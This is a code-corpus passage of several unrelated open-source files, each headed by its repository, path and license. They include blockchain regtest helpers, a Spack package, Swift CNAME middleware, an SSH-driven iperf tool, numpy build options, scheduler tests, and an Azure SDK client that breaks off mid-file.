ivansib/sibcoin | qa/rpc-tests/test_framework/blocktools.py | 1 | 3918 | #!/usr/bin/env python3
# blocktools.py - utilities for manipulating blocks and transactions
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from .mininode import *
from .script import CScript, OP_TRUE, OP_CHECKSIG
# Create a block (with regtest difficulty)
def create_block(hashprev, coinbase, nTime=None):
block = CBlock()
if nTime is None:
import time
block.nTime = int(time.time()+600)
else:
block.nTime = nTime
block.hashPrevBlock = hashprev
block.nBits = 0x207fffff # Will break after a difficulty adjustment...
block.vtx.append(coinbase)
block.hashMerkleRoot = block.calc_merkle_root()
block.calc_sha256()
return block
def serialize_script_num(value):
r = bytearray(0)
if value == 0:
return r
neg = value < 0
absvalue = -value if neg else value
while (absvalue):
r.append(int(absvalue & 0xff))
absvalue >>= 8
if r[-1] & 0x80:
r.append(0x80 if neg else 0)
elif neg:
r[-1] |= 0x80
return r
# Create a coinbase transaction, assuming no miner fees.
# If pubkey is passed in, the coinbase output will be a P2PK output;
# otherwise an anyone-can-spend output.
def create_coinbase(height, pubkey = None, dip4_activated=False):
coinbase = CTransaction()
coinbase.vin.append(CTxIn(COutPoint(0, 0xffffffff),
ser_string(serialize_script_num(height)), 0xffffffff))
coinbaseoutput = CTxOut()
coinbaseoutput.nValue = 500 * COIN
halvings = int(height/150) # regtest
coinbaseoutput.nValue >>= halvings
if (pubkey != None):
coinbaseoutput.scriptPubKey = CScript([pubkey, OP_CHECKSIG])
else:
coinbaseoutput.scriptPubKey = CScript([OP_TRUE])
coinbase.vout = [ coinbaseoutput ]
if dip4_activated:
coinbase.nVersion = 3
coinbase.nType = 5
cbtx_payload = CCbTx(1, height, 0)
coinbase.vExtraPayload = cbtx_payload.serialize()
coinbase.calc_sha256()
return coinbase
# Create a transaction.
# If the scriptPubKey is not specified, make it anyone-can-spend.
def create_transaction(prevtx, n, sig, value, scriptPubKey=CScript()):
tx = CTransaction()
assert(n < len(prevtx.vout))
tx.vin.append(CTxIn(COutPoint(prevtx.sha256, n), sig, 0xffffffff))
tx.vout.append(CTxOut(value, scriptPubKey))
tx.calc_sha256()
return tx
def get_legacy_sigopcount_block(block, fAccurate=True):
count = 0
for tx in block.vtx:
count += get_legacy_sigopcount_tx(tx, fAccurate)
return count
def get_legacy_sigopcount_tx(tx, fAccurate=True):
count = 0
for i in tx.vout:
count += i.scriptPubKey.GetSigOpCount(fAccurate)
for j in tx.vin:
# scriptSig might be of type bytes, so convert to CScript for the moment
count += CScript(j.scriptSig).GetSigOpCount(fAccurate)
return count
# Identical to GetMasternodePayment in C++ code
def get_masternode_payment(nHeight, blockValue):
ret = int(blockValue / 5)
nMNPIBlock = 350
nMNPIPeriod = 10
if nHeight > nMNPIBlock:
ret += int(blockValue / 20)
if nHeight > nMNPIBlock+(nMNPIPeriod* 1):
ret += int(blockValue / 20)
if nHeight > nMNPIBlock+(nMNPIPeriod* 2):
ret += int(blockValue / 20)
if nHeight > nMNPIBlock+(nMNPIPeriod* 3):
ret += int(blockValue / 40)
if nHeight > nMNPIBlock+(nMNPIPeriod* 4):
ret += int(blockValue / 40)
if nHeight > nMNPIBlock+(nMNPIPeriod* 5):
ret += int(blockValue / 40)
if nHeight > nMNPIBlock+(nMNPIPeriod* 6):
ret += int(blockValue / 40)
if nHeight > nMNPIBlock+(nMNPIPeriod* 7):
ret += int(blockValue / 40)
if nHeight > nMNPIBlock+(nMNPIPeriod* 9):
ret += int(blockValue / 40)
return ret
| mit |
krafczyk/spack | var/spack/repos/builtin/packages/r-dorng/package.py | 5 | 2249 | ##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RDorng(RPackage):
"""Provides functions to perform reproducible parallel foreach loops,
using independent random streams as generated by L'Ecuyer's combined
multiple-recursive generator
[L'Ecuyer (1999), <doi:10.1287/opre.47.1.159>]. It enables to easily
convert standard %dopar% loops into fully reproducible loops,
independently of the number of workers, the task scheduling strategy,
or the chosen parallel environment and associated foreach backend."""
homepage = "https://cran.rstudio.com/web/packages/doRNG/index.html"
url = "https://cran.rstudio.com/src/contrib/doRNG_1.6.6.tar.gz"
list_url = "https://cran.r-project.org/src/contrib/Archive/doRNG"
version('1.6.6', 'ffb26024c58c8c99229470293fbf35cf')
depends_on('r-foreach', type=('build', 'run'))
depends_on('r-rngtools', type=('build', 'run'))
depends_on('r-iterators', type=('build', 'run'))
depends_on('r-pkgmaker', type=('build', 'run'))
| lgpl-2.1 |
pebble/flotilla | src/test/scheduler/test_scheduler.py | 2 | 4117 | import unittest
from mock import MagicMock, ANY
from collections import defaultdict
from boto.dynamodb2.items import Item
from flotilla.db import DynamoDbLocks
from flotilla.scheduler.scheduler import FlotillaScheduler
from flotilla.scheduler.db import FlotillaSchedulerDynamo
SERVICE = 'test'
REVISION = 'rev1'
REVISION2 = 'rev2'
class TestFlotillaScheduler(unittest.TestCase):
def setUp(self):
self.db = MagicMock(spec=FlotillaSchedulerDynamo)
self.db.get_instance_assignments.return_value = defaultdict(list)
self.locks = MagicMock(spec=DynamoDbLocks)
self.scheduler = FlotillaScheduler(self.db, self.locks)
self.scheduler.active = True
def test_loop_not_active(self):
self.scheduler.active = False
self.scheduler.loop()
self.db.get_all_revision_weights.assert_not_called()
self.db.get_instance_assignments.assert_not_called()
def test_loop_no_services(self):
self.scheduler.loop()
self.db.get_instance_assignments.assert_not_called()
def test_loop_service_without_revisions(self):
self.db.get_all_revision_weights.return_value = {
SERVICE: {}
}
self.scheduler.loop()
def test_loop_assignments_no_instances(self):
self.db.get_all_revision_weights.return_value = {SERVICE: {REVISION: 1}}
self.scheduler.loop()
self.db.set_assignments.assert_not_called()
def test_loop_assignments(self):
self.db.get_all_revision_weights.return_value = {SERVICE: {REVISION: 1}}
assignment = MagicMock(spec=Item)
self.db.get_instance_assignments.return_value[None].append(assignment)
self.scheduler.loop()
self.db.set_assignments.assert_called_with(ANY)
def test_loop_assignments_reassign(self):
self.db.get_all_revision_weights.return_value = {SERVICE: {REVISION: 1}}
assignment = MagicMock(spec=Item)
self.db.get_instance_assignments.return_value[None]
self.db.get_instance_assignments.return_value[REVISION2].append(
assignment)
self.scheduler.loop()
self.db.set_assignments.assert_called_with(ANY)
def test_loop_assignments_reassign_partial(self):
self.db.get_all_revision_weights.return_value = {
SERVICE: {REVISION: 1, REVISION2: 1}}
assignment = MagicMock(spec=Item)
self.db.get_instance_assignments.return_value[None]
for i in range(2):
self.db.get_instance_assignments.return_value[REVISION2].append(
assignment)
self.scheduler.loop()
self.db.set_assignments.assert_called_with(ANY)
def test_instance_targets(self):
targets = self.scheduler._instance_targets({REVISION: 1}, 1)
self.assertEqual(1, len(targets))
self.assertEqual(1, targets[REVISION])
def test_instance_targets_rounding(self):
targets = self.scheduler._instance_targets({REVISION: 1, REVISION2: 1},
3)
self.assertEqual(2, len(targets))
self.assertEqual(1, targets[REVISION])
self.assertEqual(2, targets[REVISION2])
def test_lock_acquire(self):
self.scheduler.active = False
self.locks.try_lock.return_value = True
self.scheduler.lock()
self.assertTrue(self.scheduler.active)
def test_lock_release(self):
self.locks.try_lock.return_value = False
self.scheduler.lock()
self.assertFalse(self.scheduler.active)
def test_schedule_service_not_active(self):
self.scheduler.active = False
self.scheduler.schedule_service(SERVICE)
self.db.get_revision_weights.assert_not_called()
self.db.get_instance_assignments.assert_not_called()
def test_schedule_service(self):
weights = {REVISION: 1, REVISION2: 1}
self.db.get_revision_weights.return_value = weights
self.scheduler._schedule_service = MagicMock()
self.scheduler.schedule_service(SERVICE)
self.scheduler._schedule_service.assert_called_with(SERVICE, weights)
| mit |
levythu/swift | swift/common/middleware/cname_lookup.py | 29 | 6766 | # Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
CNAME Lookup Middleware
Middleware that translates an unknown domain in the host header to
something that ends with the configured storage_domain by looking up
the given domain's CNAME record in DNS.
This middleware will continue to follow a CNAME chain in DNS until it finds
a record ending in the configured storage domain or it reaches the configured
maximum lookup depth. If a match is found, the environment's Host header is
rewritten and the request is passed further down the WSGI chain.
"""
from six.moves import range
import socket
from swift import gettext_ as _
try:
import dns.resolver
from dns.exception import DNSException
from dns.resolver import NXDOMAIN, NoAnswer
except ImportError:
# catch this to allow docs to be built without the dependency
MODULE_DEPENDENCY_MET = False
else: # executed if the try block finishes with no errors
MODULE_DEPENDENCY_MET = True
from swift.common.swob import Request, HTTPBadRequest
from swift.common.utils import cache_from_env, get_logger, list_from_csv
def lookup_cname(domain): # pragma: no cover
"""
Given a domain, returns its DNS CNAME mapping and DNS ttl.
:param domain: domain to query on
:returns: (ttl, result)
"""
try:
answer = dns.resolver.query(domain, 'CNAME').rrset
ttl = answer.ttl
result = answer.items[0].to_text()
result = result.rstrip('.')
return ttl, result
except (DNSException, NXDOMAIN, NoAnswer):
return 0, None
def is_ip(domain):
try:
socket.inet_pton(socket.AF_INET, domain)
return True
except socket.error:
try:
socket.inet_pton(socket.AF_INET6, domain)
return True
except socket.error:
return False
class CNAMELookupMiddleware(object):
"""
CNAME Lookup Middleware
See above for a full description.
:param app: The next WSGI filter or app in the paste.deploy
chain.
:param conf: The configuration dict for the middleware.
"""
def __init__(self, app, conf):
if not MODULE_DEPENDENCY_MET:
# reraise the exception if the dependency wasn't met
raise ImportError('dnspython is required for this module')
self.app = app
storage_domain = conf.get('storage_domain', 'example.com')
self.storage_domain = ['.' + s for s in
list_from_csv(storage_domain)
if not s.startswith('.')]
self.storage_domain += [s for s in list_from_csv(storage_domain)
if s.startswith('.')]
self.lookup_depth = int(conf.get('lookup_depth', '1'))
self.memcache = None
self.logger = get_logger(conf, log_route='cname-lookup')
def _domain_endswith_in_storage_domain(self, a_domain):
for domain in self.storage_domain:
if a_domain.endswith(domain):
return True
return False
def __call__(self, env, start_response):
if not self.storage_domain:
return self.app(env, start_response)
if 'HTTP_HOST' in env:
given_domain = env['HTTP_HOST']
else:
given_domain = env['SERVER_NAME']
port = ''
if ':' in given_domain:
given_domain, port = given_domain.rsplit(':', 1)
if is_ip(given_domain):
return self.app(env, start_response)
a_domain = given_domain
if not self._domain_endswith_in_storage_domain(a_domain):
if self.memcache is None:
self.memcache = cache_from_env(env)
error = True
for tries in range(self.lookup_depth):
found_domain = None
if self.memcache:
memcache_key = ''.join(['cname-', a_domain])
found_domain = self.memcache.get(memcache_key)
if not found_domain:
ttl, found_domain = lookup_cname(a_domain)
if self.memcache:
memcache_key = ''.join(['cname-', given_domain])
self.memcache.set(memcache_key, found_domain,
time=ttl)
if found_domain is None or found_domain == a_domain:
# no CNAME records or we're at the last lookup
error = True
found_domain = None
break
elif self._domain_endswith_in_storage_domain(found_domain):
# Found it!
self.logger.info(
_('Mapped %(given_domain)s to %(found_domain)s') %
{'given_domain': given_domain,
'found_domain': found_domain})
if port:
env['HTTP_HOST'] = ':'.join([found_domain, port])
else:
env['HTTP_HOST'] = found_domain
error = False
break
else:
# try one more deep in the chain
self.logger.debug(
_('Following CNAME chain for '
'%(given_domain)s to %(found_domain)s') %
{'given_domain': given_domain,
'found_domain': found_domain})
a_domain = found_domain
if error:
if found_domain:
msg = 'CNAME lookup failed after %d tries' % \
self.lookup_depth
else:
msg = 'CNAME lookup failed to resolve to a valid domain'
resp = HTTPBadRequest(request=Request(env), body=msg,
content_type='text/plain')
return resp(env, start_response)
return self.app(env, start_response)
def filter_factory(global_conf, **local_conf): # pragma: no cover
conf = global_conf.copy()
conf.update(local_conf)
def cname_filter(app):
return CNAMELookupMiddleware(app, conf)
return cname_filter
| apache-2.0 |
netgroup/Dreamer-Measurements-Tools | iperf_nodes.py | 1 | 3471 | #!/usr/bin/python
import sys
import paramiko
import cmd
import re
from subprocess import Popen
from threading import Thread
from time import sleep
import os
class iperfNode(object):
def __init__(self, host, user, pwd):
self.host = host
self.user = user
self.pwd = pwd
self.chan = None
self.conn = None
self.process = None
path = "log/"
if os.path.exists(path) == False:
os.mkdir(path, 0755)
path_log = "./log/%s.log" % host
if os.path.exists(path_log):
os.remove(path_log)
self.log = open( path_log, "a")
self.STOP = False
self.return_data = ""
self.t_connect()
def t_connect(self):
self.conn_thread = Thread( target=self.connect)
self.conn_thread.start()
self.conn_thread.join()
def connect(self):
self.conn = paramiko.SSHClient()
self.conn.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.conn.connect(self.host,username=self.user, password=self.pwd)
self.chan = self.conn.invoke_shell()
self.wait_command('',False)
def run(self, command, verbose=True):
buff = ''
self.chan.send(command+"\r")
buff = self.wait_command(command, verbose)
self.return_data = buff
def exe(self, command):
buff = ''
stdin, stdout, stderr = self.conn.exec_command(command)
stdin.close()
for line in stdout.read().splitlines():
buff+= line+'\n'
return buff
def wait_command(self,command, verbose):
buff = ''
i = 0
s = re.compile('[^#]# ')
u = re.compile('[$] ')
while not u.search(buff) and not s.search(buff) and self.STOP == False:
resp = self.chan.recv(9999)
if (verbose):
self.log.write(resp)
buff += resp
if (verbose):
self.log.write("\n")
return buff
def close(self):
self.STOP = True
if self.conn != None:
self.conn.close()
if self.process:
self.process.terminate()
self.log.close()
class iperfClient(iperfNode):
UDP = "-u"
DGRAMSIZE= "-l 1000"
BUFFSIZE= "-w 256k"
def __init__(self, params):
iperfNode.__init__(self, params[0], params[1], params[2])
self.op_thread = None
self.server = params[3]
def start(self, length, rate):
server = "-c %s" % self.server
length = "-t %s" % length
rate = "-b %sm" % rate
params = "iperf %s %s %s %s %s %s" % (server, self.UDP, rate, self.DGRAMSIZE, length, self.BUFFSIZE)
self.op_thread = Thread(target = self.iperf, args=(params,))
self.op_thread.start()
def join(self):
self.op_thread.join()
def iperf(self, params):
self.log.write("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n")
iperfNode.run(self, params, True)
def getLoss(self):
p_loss = re.compile('[0-9]*.[0-9]*%')
match = p_loss.search(self.return_data)
if match == None:
return "N/A"
s = (match.group(0).replace("%",""))
if "(" in s:
return s[1:]
return s
def getJitter(self):
p_ms = re.compile('[0-9]*.[0-9]* ms')
match = p_ms.search(self.return_data)
if match == None:
return "N/A"
return (match.group(0).replace(" ms",""))
class iperfServer(iperfNode):
UDP = "-u"
DGRAMSIZE= "-l 1000"
BUFFSIZE= "-w 256k"
def __init__(self, params):
iperfNode.__init__(self, params[0], params[1], params[2])
self.op_thread = None
def start(self):
params = "iperf -s %s %s %s" % (self.UDP, self.DGRAMSIZE, self.BUFFSIZE)
self.op_thread = Thread(target = self.iperf, args=(params,))
self.op_thread.start()
def iperf(self, params):
iperfNode.run(self, params, True)
def close(self):
iperfNode.close(self)
self.op_thread.join()
| apache-2.0 |
madphysicist/numpy | numpy/distutils/command/build.py | 10 | 2566 | import os
import sys
from distutils.command.build import build as old_build
from distutils.util import get_platform
from numpy.distutils.command.config_compiler import show_fortran_compilers
class build(old_build):
sub_commands = [('config_cc', lambda *args: True),
('config_fc', lambda *args: True),
('build_src', old_build.has_ext_modules),
] + old_build.sub_commands
user_options = old_build.user_options + [
('fcompiler=', None,
"specify the Fortran compiler type"),
('warn-error', None,
"turn all warnings into errors (-Werror)"),
('cpu-baseline=', None,
"specify a list of enabled baseline CPU optimizations"),
('cpu-dispatch=', None,
"specify a list of dispatched CPU optimizations"),
('disable-optimization', None,
"disable CPU optimized code(dispatch,simd,fast...)"),
('simd-test=', None,
"specify a list of CPU optimizations to be tested against NumPy SIMD interface"),
]
help_options = old_build.help_options + [
('help-fcompiler', None, "list available Fortran compilers",
show_fortran_compilers),
]
def initialize_options(self):
old_build.initialize_options(self)
self.fcompiler = None
self.warn_error = False
self.cpu_baseline = "min"
self.cpu_dispatch = "max -xop -fma4" # drop AMD legacy features by default
self.disable_optimization = False
"""
the '_simd' module is a very large. Adding more dispatched features
will increase binary size and compile time. By default we minimize
the targeted features to those most commonly used by the NumPy SIMD interface(NPYV),
NOTE: any specified features will be ignored if they're:
- part of the baseline(--cpu-baseline)
- not part of dispatch-able features(--cpu-dispatch)
- not supported by compiler or platform
"""
self.simd_test = "BASELINE SSE2 SSE42 XOP FMA4 (FMA3 AVX2) AVX512F AVX512_SKX VSX VSX2 VSX3 NEON ASIMD"
def finalize_options(self):
build_scripts = self.build_scripts
old_build.finalize_options(self)
plat_specifier = ".{}-{}.{}".format(get_platform(), *sys.version_info[:2])
if build_scripts is None:
self.build_scripts = os.path.join(self.build_base,
'scripts' + plat_specifier)
def run(self):
old_build.run(self)
| bsd-3-clause |
alvarolopez/nova | nova/tests/unit/scheduler/filters/test_aggregate_instance_extra_specs_filters.py | 56 | 3683 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from nova.scheduler.filters import aggregate_instance_extra_specs as agg_specs
from nova import test
from nova.tests.unit.scheduler import fakes
@mock.patch('nova.scheduler.filters.utils.aggregate_metadata_get_by_host')
class TestAggregateInstanceExtraSpecsFilter(test.NoDBTestCase):
def setUp(self):
super(TestAggregateInstanceExtraSpecsFilter, self).setUp()
self.filt_cls = agg_specs.AggregateInstanceExtraSpecsFilter()
def test_aggregate_filter_passes_no_extra_specs(self, agg_mock):
capabilities = {'opt1': 1, 'opt2': 2}
filter_properties = {'context': mock.sentinel.ctx, 'instance_type':
{'memory_mb': 1024}}
host = fakes.FakeHostState('host1', 'node1', capabilities)
self.assertTrue(self.filt_cls.host_passes(host, filter_properties))
self.assertFalse(agg_mock.called)
def _do_test_aggregate_filter_extra_specs(self, especs, passes):
filter_properties = {'context': mock.sentinel.ctx,
'instance_type': {'memory_mb': 1024, 'extra_specs': especs}}
host = fakes.FakeHostState('host1', 'node1',
{'free_ram_mb': 1024})
assertion = self.assertTrue if passes else self.assertFalse
assertion(self.filt_cls.host_passes(host, filter_properties))
def test_aggregate_filter_passes_extra_specs_simple(self, agg_mock):
agg_mock.return_value = {'opt1': '1', 'opt2': '2'}
especs = {
# Un-scoped extra spec
'opt1': '1',
# Scoped extra spec that applies to this filter
'aggregate_instance_extra_specs:opt2': '2',
# Scoped extra spec that does not apply to this filter
'trust:trusted_host': 'true',
}
self._do_test_aggregate_filter_extra_specs(especs, passes=True)
def test_aggregate_filter_passes_extra_specs_simple_comma(self, agg_mock):
agg_mock.return_value = {'opt1': '1,3', 'opt2': '2'}
especs = {
# Un-scoped extra spec
'opt1': '1',
# Scoped extra spec that applies to this filter
'aggregate_instance_extra_specs:opt1': '3',
# Scoped extra spec that does not apply to this filter
'trust:trusted_host': 'true',
}
self._do_test_aggregate_filter_extra_specs(especs, passes=True)
def test_aggregate_filter_passes_with_key_same_as_scope(self, agg_mock):
agg_mock.return_value = {'aggregate_instance_extra_specs': '1'}
especs = {
# Un-scoped extra spec, make sure we don't blow up if it
# happens to match our scope.
'aggregate_instance_extra_specs': '1',
}
self._do_test_aggregate_filter_extra_specs(especs, passes=True)
def test_aggregate_filter_fails_extra_specs_simple(self, agg_mock):
agg_mock.return_value = {'opt1': '1', 'opt2': '2'}
especs = {
'opt1': '1',
'opt2': '222',
'trust:trusted_host': 'true'
}
self._do_test_aggregate_filter_extra_specs(especs, passes=False)
| apache-2.0 |
AutorestCI/azure-sdk-for-python | azure-mgmt-network/azure/mgmt/network/v2017_08_01/operations/route_filters_operations.py | 1 | 25552 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrest.exceptions import DeserializationError
from msrestazure.azure_operation import AzureOperationPoller
from .. import models
class RouteFiltersOperations(object):
"""RouteFiltersOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An objec model deserializer.
:ivar api_version: Client API version. Constant value: "2017-08-01".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2017-08-01"
self.config = config
def _delete_initial(
self, resource_group_name, route_filter_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200, 202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete(
self, resource_group_name, route_filter_name, custom_headers=None, raw=False, **operation_config):
"""Deletes the specified route filter.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param route_filter_name: The name of the route filter.
:type route_filter_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:return: An instance of AzureOperationPoller that returns None or
ClientRawResponse if raw=true
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
route_filter_name=route_filter_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
if raw:
return raw_result
# Construct and send request
def long_running_send():
return raw_result.response
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
header_parameters = {}
header_parameters['x-ms-client-request-id'] = raw_result.response.request.headers['x-ms-client-request-id']
return self._client.send(
request, header_parameters, stream=False, **operation_config)
def get_long_running_output(response):
if response.status_code not in [200, 202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
def get(
self, resource_group_name, route_filter_name, expand=None, custom_headers=None, raw=False, **operation_config):
"""Gets the specified route filter.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param route_filter_name: The name of the route filter.
:type route_filter_name: str
:param expand: Expands referenced express route bgp peering resources.
:type expand: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: RouteFilter or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.network.v2017_08_01.models.RouteFilter or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('RouteFilter', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def _create_or_update_initial(
self, resource_group_name, route_filter_name, route_filter_parameters, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(route_filter_parameters, 'RouteFilter')
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200, 201]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('RouteFilter', response)
if response.status_code == 201:
deserialized = self._deserialize('RouteFilter', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_or_update(
self, resource_group_name, route_filter_name, route_filter_parameters, custom_headers=None, raw=False, **operation_config):
"""Creates or updates a route filter in a specified resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param route_filter_name: The name of the route filter.
:type route_filter_name: str
:param route_filter_parameters: Parameters supplied to the create or
update route filter operation.
:type route_filter_parameters:
~azure.mgmt.network.v2017_08_01.models.RouteFilter
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:return: An instance of AzureOperationPoller that returns RouteFilter
or ClientRawResponse if raw=true
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.network.v2017_08_01.models.RouteFilter]
or ~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
route_filter_name=route_filter_name,
route_filter_parameters=route_filter_parameters,
custom_headers=custom_headers,
raw=True,
**operation_config
)
if raw:
return raw_result
# Construct and send request
def long_running_send():
return raw_result.response
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
header_parameters = {}
header_parameters['x-ms-client-request-id'] = raw_result.response.request.headers['x-ms-client-request-id']
return self._client.send(
request, header_parameters, stream=False, **operation_config)
def get_long_running_output(response):
if response.status_code not in [200, 201]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = self._deserialize('RouteFilter', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
def _update_initial(
